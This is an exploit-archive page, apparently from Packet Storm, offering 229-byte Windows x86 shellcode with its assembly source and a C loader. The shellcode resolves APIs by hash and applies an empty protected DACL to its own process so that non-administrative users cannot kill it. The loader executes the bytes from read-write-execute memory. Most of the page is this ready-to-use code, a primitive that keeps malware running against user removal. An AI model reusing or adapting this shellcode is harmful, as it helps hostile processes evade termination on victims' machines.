exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Windows x86 Protect Process Shellcode

Windows x86 Protect Process Shellcode
Posted Feb 17, 2017
Authored by Ege Balci

229 bytes small Windows x86 protect process shellcode.

tags | x86, shellcode
systems | windows
SHA-256 | b8fe8bc29e25d0326cace2297fc1684495e84eb4288f471a99b735848293e156

Windows x86 Protect Process Shellcode

Change Mirror Download
/*

# Win32 - Protect Process Shellcode
# Date: [17.02.2017]
# Author: [Ege BalcA+-]
# Tested on: [Win 7/8/8.1/10]

This shellcode sets the SE_DACL_PROTECTED flag inside security descriptor structure,
this will prevent the process being terminated by non administrative users.

-----------------------------------------------------------------

[BITS 32]
[ORG 0]

; EAX-> Return Values
; EBX-> Process Handle
; EBP-> API Block
; ESI-> Saved ESP

pushad ; Save all registers to stack
pushfd ; Save all flags to stack

push esp ; Push the current esp value
pop esi ; Save the current esp value to ecx

cld ; Clear direction flags
call Start

%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project

Start:
pop ebp ; Pop the address of SFHA

push 0x62C64749 ; hash(kernel32.dll, GetCurrentProcessId())
call ebp ; GetCurrentProcessId()

push eax ; Process ID
push 0x00000000 ; FALSE
push 0x1F0FFF ; PROCESS_ALL_ACCESS
push 0x50B695EE ; hash(kernel32.dll, OpenProcess)
call ebp ; OpenProcess(PROCESS_ALL_ACCESS,FALSE,ECX)
mov ebx, eax ; Move process handle to ebx


push 0x00000000 ; 0,0
push 0x32336970 ; pi32
push 0x61766461 ; adva
push esp ; Push the address of "advapi32" string
push 0x0726774C ; hash(kernel32.dll, LoadLibraryA)
call ebp ; LoadLibraryA("advapi32")

push 0x00503a44 ; "D:P"
sub esp,4 ; Push the address of "D:P" string to stack

push 0x00000000 ; FALSE
lea eax, [esp+4] ; Load the address of 4 byte buffer to EAX
push eax ; Push the 4 byte buffer address
push 0x00000001 ; SDDL_REVISION_1
lea eax, [esp+16] ; Load the address of "D:P" string to EAX
push eax ; Push the EAX value
push 0xDA6F639A ; hash(advapi32.dll, ConvertStringSecurityDescriptorToSecurityDescriptor)
call ebp ; ConvertStringSecurityDescriptorToSecurityDescriptor("D:P",SDDL_REVISION_1,FALSE)

push 0x00000004 ; DACL_SECURITY_INFORMATION
push ebx ; Process Handle
push 0xD63AF8DB ; hash(kernel32.dll, SetKernelObjectSecurity)
call ebp ; SetKernelObjectSecurity(ProcessHandle,DACL_SECURITY_INFORMATION,SecurityDescriptor)

mov esp,esi ; Restore the address of esp
popad ; Popback all registers
popfd ; Popback all flags
ret ; Return


*/


//>Special thanks to Yusuf Arslan Polat ;D
#include <windows.h>
#include <stdio.h>

unsigned char Shellcode[] = {
0x60, 0x9c, 0x54, 0x5e, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c,
0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2,
0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78,
0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49,
0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac,
0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8,
0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66,
0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01,
0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff,
0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x49, 0x47,
0xc6, 0x62, 0xff, 0xd5, 0x50, 0x6a, 0x00, 0x68, 0xff, 0x0f, 0x1f, 0x00,
0x68, 0xee, 0x95, 0xb6, 0x50, 0xff, 0xd5, 0x89, 0xc3, 0x6a, 0x00, 0x68,
0x70, 0x69, 0x33, 0x32, 0x68, 0x61, 0x64, 0x76, 0x61, 0x54, 0x68, 0x4c,
0x77, 0x26, 0x07, 0xff, 0xd5, 0x68, 0x44, 0x3a, 0x50, 0x00, 0x83, 0xec,
0x04, 0x6a, 0x00, 0x8d, 0x44, 0x24, 0x04, 0x50, 0x6a, 0x01, 0x8d, 0x44,
0x24, 0x10, 0x50, 0x68, 0x9a, 0x63, 0x6f, 0xda, 0xff, 0xd5, 0x6a, 0x04,
0x53, 0x68, 0xdb, 0xf8, 0x3a, 0xd6, 0xff, 0xd5, 0x89, 0xf4, 0x61, 0x9d,
0xc3
};



int main(int argc, char const *argv[])
{
char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(BUFFER, Shellcode, sizeof(Shellcode));
(*(void(*)())BUFFER)();

printf("This process is protected !");
getchar();

return 0;
}

Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close